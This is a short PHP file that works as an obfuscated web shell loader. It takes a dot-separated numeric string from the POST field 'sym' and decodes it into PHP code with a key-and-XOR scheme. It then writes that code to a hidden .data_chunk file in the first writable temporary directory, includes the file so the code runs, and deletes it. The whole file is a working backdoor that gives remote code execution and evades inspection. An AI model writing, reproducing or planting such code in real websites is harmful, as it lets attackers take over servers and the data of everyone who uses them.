<?php

if(!is_null($_POST["sym"] ?? null)){
	$descriptor = $_POST["sym"];
	  $descriptor 	=	explode(	"."	 	,	 $descriptor		)  	;		
	$obj = '';
            $s = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($s		);
    
            foreach ($descriptor as $k=>$v6) {$chS = ord($s[$k % $lenS]		);
                $d = ((int)$v6 - $chS - ($k % 10))	 ^	 47;
                $obj	 .=	chr($d		);
            }
	$itm = array_filter(["/dev/shm", getenv("TEMP"), ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", getcwd(), sys_get_temp_dir(), session_save_path(), getenv("TMP")]);
	foreach ($itm as $key => $hld) {
    		if ((bool)is_dir($hld) && (bool)is_writable($hld)) {
    $reference = sprintf("%s/.data_chunk", $hld);
    if (@file_put_contents($reference, $obj) !== false) {
	include $reference;
	unlink($reference);
	die();
}
}
}
}